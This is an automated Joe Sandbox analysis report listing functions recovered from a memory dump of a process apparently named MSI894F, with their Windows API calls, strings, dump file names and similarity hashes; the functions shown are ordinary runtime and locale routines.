GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00D67747), ref: 00D67791
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D677A3
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D677B1
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00D67747), ref: 00D677D4
DeleteCriticalSection.KERNEL32(00DA4AF8,00000007,?,?,00D67747), ref: 00D677F0
CloseHandle.KERNEL32(00000000,?,?,00D67747), ref: 00D67800

Strings

WakeAllConditionVariable, xrefs: 00D677A9
SleepConditionVariableCS, xrefs: 00D6779D
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D6777B
kernel32.dll, xrefs: 00D6778C

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 4b4a680e1fe81156a122173e5891e200790ea0ada5efb04bc378c60e04ef53e6
Instruction ID: d4808ebe962c631635242c4a551c0fc24a3d7cab851a3afd2c57d81a279d6829
Opcode Fuzzy Hash: 4b4a680e1fe81156a122173e5891e200790ea0ada5efb04bc378c60e04ef53e6
Instruction Fuzzy Hash: 22017C35B95711AFD7212F74AC0DE163BAAAF86F49B190015F805D63E0DBB4C8008B79

Function 00D4F010 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000018,7EBC463A,?,00000000), ref: 00D4F076
std::_Lockit::_Lockit.LIBCPMT ref: 00D4F0B3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D4F11D
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D4F2B9
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4F376
Concurrency::cancel_current_task.LIBCPMT ref: 00D4F39E

Strings

true, xrefs: 00D4F1EC
false, xrefs: 00D4F1D6
bad locale name, xrefs: 00D4F3A3

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 975656625-1062449267
Opcode ID: 95163f816dacfbef3cecd7696591e7762498d9fa2e06ffdfeb826c91e7bce91d
Instruction ID: 261c25884991a1577752d19f882d4c1764eb94d8b48bed0c7b15ccee38d7aaae
Opcode Fuzzy Hash: 95163f816dacfbef3cecd7696591e7762498d9fa2e06ffdfeb826c91e7bce91d
Instruction Fuzzy Hash: F8B16FB1D00348DBEF21DFA4C94579EBBB4FF15304F1481A9E844AB281E775AA48CB71

Function 00D46A60 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,7EBC463A,?,00000000), ref: 00D46AC2
OpenProcess.KERNEL32(00000400,00000000,00000000,?,7EBC463A,?,00000000), ref: 00D46AE3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7EBC463A,?,00000000), ref: 00D46B16
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7EBC463A,?,00000000), ref: 00D46B27
CloseHandle.KERNEL32(00000000,?,7EBC463A,?,00000000), ref: 00D46B45
CloseHandle.KERNEL32(00000000,?,7EBC463A,?,00000000), ref: 00D46B61
CloseHandle.KERNEL32(00000000,?,7EBC463A,?,00000000), ref: 00D46B89
CloseHandle.KERNEL32(00000000,?,7EBC463A,?,00000000), ref: 00D46BA5
CloseHandle.KERNEL32(00000000,?,7EBC463A,?,00000000), ref: 00D46BC3
CloseHandle.KERNEL32(00000000,?,7EBC463A,?,00000000), ref: 00D46BDF

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: CloseHandle$Process$OpenTimes
String ID:
API String ID: 1711917922-0
Opcode ID: e177ab1c6602cdc0d20c151eb7ac467a42816ef2003d59b5ac0c77d024ea562c
Instruction ID: 37c72676afe36284e8d237833029f13e42ccfff41628368fde331346367bc519
Opcode Fuzzy Hash: e177ab1c6602cdc0d20c151eb7ac467a42816ef2003d59b5ac0c77d024ea562c
Instruction Fuzzy Hash: D55158B0D01218ABDB10CF98C984BEEFBB5EB49724F244219E515B73C0C7749905CBBA

Function 00D60834 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D6083B

Part of subcall function 00D5780A: __EH_prolog3.LIBCMT ref: 00D57811
Part of subcall function 00D5780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D5781B
Part of subcall function 00D5780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D5788C

Strings

%d / %m / %y, xrefs: 00D60B9E
:AM:am:PM:pm, xrefs: 00D60BD0
%b %d %H : %M : %S %Y, xrefs: 00D60AF3
%m / %d / %y, xrefs: 00D60937
%H : %M, xrefs: 00D60980
%I : %M : %S %p, xrefs: 00D60BC5
%H : %M : %S, xrefs: 00D609F7

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1538362411-2891247106
Opcode ID: dbd3db96fb2309a930ee69a635584966899e93c7d8b91db8f025c96f3926616b
Instruction ID: a934c080609a29664630be56c21038e484996733dcf7d9f74425e0278c34a95f
Opcode Fuzzy Hash: dbd3db96fb2309a930ee69a635584966899e93c7d8b91db8f025c96f3926616b
Instruction Fuzzy Hash: A7C18E7254020AAFDF18DFA8C9A5DFF7FA9EB09314F18451AFA42A3251D670DA04CB70

Function 00D659E2 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D659E9

Part of subcall function 00D4C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D4C5BD
Part of subcall function 00D4C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D4C5E0
Part of subcall function 00D4C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C608
Part of subcall function 00D4C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C6A7

Strings

%d / %m / %y, xrefs: 00D65D4C
:AM:am:PM:pm, xrefs: 00D65D7E
%b %d %H : %M : %S %Y, xrefs: 00D65CA1
%m / %d / %y, xrefs: 00D65AE5
%H : %M, xrefs: 00D65B2E
%I : %M : %S %p, xrefs: 00D65D73
%H : %M : %S, xrefs: 00D65BA5

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: 6774eb0c71566aa689313d78e17b14bb6a9dd5e4ae07287ac7eab705672ea376
Instruction ID: d601efd5cb7f94fc925f9f3ecde53b483051c0ddbcc496071d604bd4c6f37117
Opcode Fuzzy Hash: 6774eb0c71566aa689313d78e17b14bb6a9dd5e4ae07287ac7eab705672ea376
Instruction Fuzzy Hash: 01C19476500609AFDB18DF98D999EFF3BB8EB05300F154219FA42A7299D631DA80CF70

Function 00D60C24 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D60C2B

Part of subcall function 00D4B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D4B52D
Part of subcall function 00D4B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D4B550
Part of subcall function 00D4B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4B578
Part of subcall function 00D4B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4B617

Strings

%d / %m / %y, xrefs: 00D60F8E
:AM:am:PM:pm, xrefs: 00D60FC0
%b %d %H : %M : %S %Y, xrefs: 00D60EE3
%m / %d / %y, xrefs: 00D60D27
%H : %M, xrefs: 00D60D70
%I : %M : %S %p, xrefs: 00D60FB5
%H : %M : %S, xrefs: 00D60DE7

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: b19df7ae9d0aff0040abff8d2540c296e583d2f24f586433b6fe87ba8e4beed0
Instruction ID: e8e62d58ba34c62ce17194b7454bf4c55a44b65e0595a45e2181f09fb46c3720
Opcode Fuzzy Hash: b19df7ae9d0aff0040abff8d2540c296e583d2f24f586433b6fe87ba8e4beed0
Instruction Fuzzy Hash: 7EC1507650010AAFDF28DFA8C995DFF7FA8EF09300F184A19FA46A6251D671DA14CB70

Function 00D5D491 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D5D498
_Maklocstr.LIBCPMT ref: 00D5D501
_Maklocstr.LIBCPMT ref: 00D5D513
_Maklocchr.LIBCPMT ref: 00D5D52B
_Maklocchr.LIBCPMT ref: 00D5D53B
_Getvals.LIBCPMT ref: 00D5D55D

Part of subcall function 00D5708B: _Maklocchr.LIBCPMT ref: 00D570BA
Part of subcall function 00D5708B: _Maklocchr.LIBCPMT ref: 00D570D0

Strings

true, xrefs: 00D5D50E
false, xrefs: 00D5D4FC

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: edee9f319006c9b7c9ceff6c5a3ad7466b779fb93439c14fa8f209406f54d194
Instruction ID: 3627a4e7e14141e92e5f38ace01abe65f176c9bbfb7ca553058ba2fd6f3b4d87
Opcode Fuzzy Hash: edee9f319006c9b7c9ceff6c5a3ad7466b779fb93439c14fa8f209406f54d194
Instruction Fuzzy Hash: 0B214F71D04308AADF15EFE4E886A9E7BA8EF05711F108116FD199F292EA70D548CBB1

Function 00D6B22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00D6B34B
___TypeMatch.LIBVCRUNTIME ref: 00D6B459
_UnwindNestedFrames.LIBCMT ref: 00D6B5AB
CallUnexpected.LIBVCRUNTIME ref: 00D6B5C6

Strings

csm, xrefs: 00D6B269
csm, xrefs: 00D6B2D6
csm, xrefs: 00D6B382

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: b52c4c835fb4f52b58b6e6dc0545348e8d843680e8a380aca61afd63db7120e8
Instruction ID: d67a943f3af429176e7c62d1f95364d24a42c9620b3fe76e49c2c80fb6aadb6f
Opcode Fuzzy Hash: b52c4c835fb4f52b58b6e6dc0545348e8d843680e8a380aca61afd63db7120e8
Instruction Fuzzy Hash: 97B13971900219EFCF15DFA4C8819AEBBB5FF14324B18415AE856AB212D731EE91CFB1

Function 00D50260 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 269memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00D50322
LocalAlloc.KERNEL32(00000040,?), ref: 00D50367
___std_exception_copy.LIBVCRUNTIME ref: 00D503DE
LocalFree.KERNEL32(?), ref: 00D5041B
LocalFree.KERNEL32(?,?,?,?,?,7EBC463A,7EBC463A,?,?), ref: 00D50546

Strings

ios_base::failbit set, xrefs: 00D504B2
iostream, xrefs: 00D505A0

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Local$AllocFree$___std_exception_copy
String ID: ios_base::failbit set$iostream
API String ID: 2276494016-302468714
Opcode ID: 480ebc877b4ffdc1273601de0109defb0172199e0cb6372d52605583130fd84c
Instruction ID: 67f0bdf20e1930e55d82334bf1c789d2d4956b01c382d0572f6484d2bac04e2e
Opcode Fuzzy Hash: 480ebc877b4ffdc1273601de0109defb0172199e0cb6372d52605583130fd84c
Instruction Fuzzy Hash: CFA190B1D012089FDB08DFA8D985BAEBBB5FF49310F14825DE815AB391DB709944CBB1

Function 00D4BA30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000044,7EBC463A,?,00000000), ref: 00D4BA8B
std::_Lockit::_Lockit.LIBCPMT ref: 00D4BAC8
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D4BB35
__Getctype.LIBCPMT ref: 00D4BB7E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D4BBF2
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BCAF

Strings

bad locale name, xrefs: 00D4BCCD

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3635123611-1405518554
Opcode ID: 2168f704f7af777fa542d2f3b3d9b5723995003997287755b81f90fdacc30191
Instruction ID: a1907a28d443dac2dbcc2245c6b9424cb25a1cf16cef5bf591e36e6308e37c90
Opcode Fuzzy Hash: 2168f704f7af777fa542d2f3b3d9b5723995003997287755b81f90fdacc30191
Instruction Fuzzy Hash: 168150B0D04348DFEB20DFA8C94579EBBF4AF15314F188199D884AB281EB75DA48DB71

Function 00D4C220 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000018,7EBC463A,?,00000000,?,?,?,?,?,?,?,00000000,00D8ABC5,000000FF), ref: 00D4C264
std::_Lockit::_Lockit.LIBCPMT ref: 00D4C29E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D4C302
__Getctype.LIBCPMT ref: 00D4C34B
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D4C391
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C445

Strings

bad locale name, xrefs: 00D4C460

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3635123611-1405518554
Opcode ID: 16b371bdb9f4ec3bc85c198fa1cf032041d4b4b29a534df070a2e4cb7947a8cd
Instruction ID: 6ea0af8335f6d0c47c01e080165c628d4d50e0aa20b81a619e727b40ba1b6770
Opcode Fuzzy Hash: 16b371bdb9f4ec3bc85c198fa1cf032041d4b4b29a534df070a2e4cb7947a8cd
Instruction Fuzzy Hash: B2615CB0D11288EFEB50DFE8C50879EBBB4AF15314F188159E854AB381E7B59A08DB71

Function 00D6743E Relevance: 12.2, APIs: 8, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00D674C9
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D67557
__alloca_probe_16.LIBCMT ref: 00D67581
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D675C9
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D675E3
__alloca_probe_16.LIBCMT ref: 00D67609
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D67646
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00D67663

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
String ID:
API String ID: 3603178046-0
Opcode ID: 676040578ce9f4900670b3cdb3624385fc17e33e67e0b0b2faf0778f2051e372
Instruction ID: 6ea804b12fe1b82b58c0d9a04f30f7109a7a28be27411f9534f34a68abd1f17b
Opcode Fuzzy Hash: 676040578ce9f4900670b3cdb3624385fc17e33e67e0b0b2faf0778f2051e372
Instruction Fuzzy Hash: B571A47191864E9FDF218FA8CC55AEE7FBAEF45358F284055E445E6290EB35D800CB70

Function 00D66F23 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00D4C6DF,?,00000001,00000000,?,00000000,?,00D4C6DF,?), ref: 00D66F6C
__alloca_probe_16.LIBCMT ref: 00D66F98
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00D4C6DF,?,?,00000000,00D4CCD3,0000003F,?), ref: 00D66FD7
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D4C6DF,?,?,00000000,00D4CCD3,0000003F), ref: 00D66FF4
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00D4C6DF,?,?,00000000,00D4CCD3,0000003F), ref: 00D67033
__alloca_probe_16.LIBCMT ref: 00D67050
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D4C6DF,?,?,00000000,00D4CCD3,0000003F), ref: 00D67092
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00D4C6DF,?,?,00000000,00D4CCD3,0000003F,?), ref: 00D670B5

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 43f121cb803e6016606a656e1c1b15d48936396ab207a4867ad34422b8ed3e83
Instruction ID: 8229f0c922677a1731ba1214f35d90726e9f7674bfe392d5a249f7f1bc718b93
Opcode Fuzzy Hash: 43f121cb803e6016606a656e1c1b15d48936396ab207a4867ad34422b8ed3e83
Instruction Fuzzy Hash: 77519C7291420AAFEF209F60DC45FAB7BBAEF44758F194029F904D6190EB31DD148BB0

Function 00D45940 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 389fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,URL,00000000,?,7EBC463A,?,00000004), ref: 00D459AA
LocalFree.KERNEL32(?), ref: 00D45ABB
MoveFileW.KERNEL32(?,00000000), ref: 00D45D5B
DeleteFileW.KERNEL32(?), ref: 00D45DA3

Strings

URL, xrefs: 00D459A4, 00D45D8B
url, xrefs: 00D45ADC, 00D45D86

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: File$DeleteFreeLocalMoveNameTemp
String ID: URL$url
API String ID: 1622375482-346267919
Opcode ID: c2878463ef99ea3517e76172e9c4bec687963c7e3032f8238e16f5efc8d03904
Instruction ID: 48566aeb28db5330876c43d6baae52efc0f8fba65fa0ae4b9d45088db85d0a89
Opcode Fuzzy Hash: c2878463ef99ea3517e76172e9c4bec687963c7e3032f8238e16f5efc8d03904
Instruction Fuzzy Hash: 5A025670A146699BCB24DF28DD98B9DB7B1FF54304F1042D9E409A7291EB74ABC4CFA0

Function 00D4F5E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,0000000C,7EBC463A,?,00000000,00000000,?,?,?,?,00000000,00D8B2D1,000000FF,?,00D4EBCA,00000000), ref: 00D4F624
std::_Lockit::_Lockit.LIBCPMT ref: 00D4F65A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D4F6BE
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D4F77E
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4F832

Strings

bad locale name, xrefs: 00D4F84E

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2968629171-1405518554
Opcode ID: 5d6d06f43244ba078437ce96581ac4b3f54f4076ace8d459d01bc15f85ff2101
Instruction ID: c9c113c857236736cd9d579237a64b6a2afedb6c60ff00f5b089755c35c7811c
Opcode Fuzzy Hash: 5d6d06f43244ba078437ce96581ac4b3f54f4076ace8d459d01bc15f85ff2101
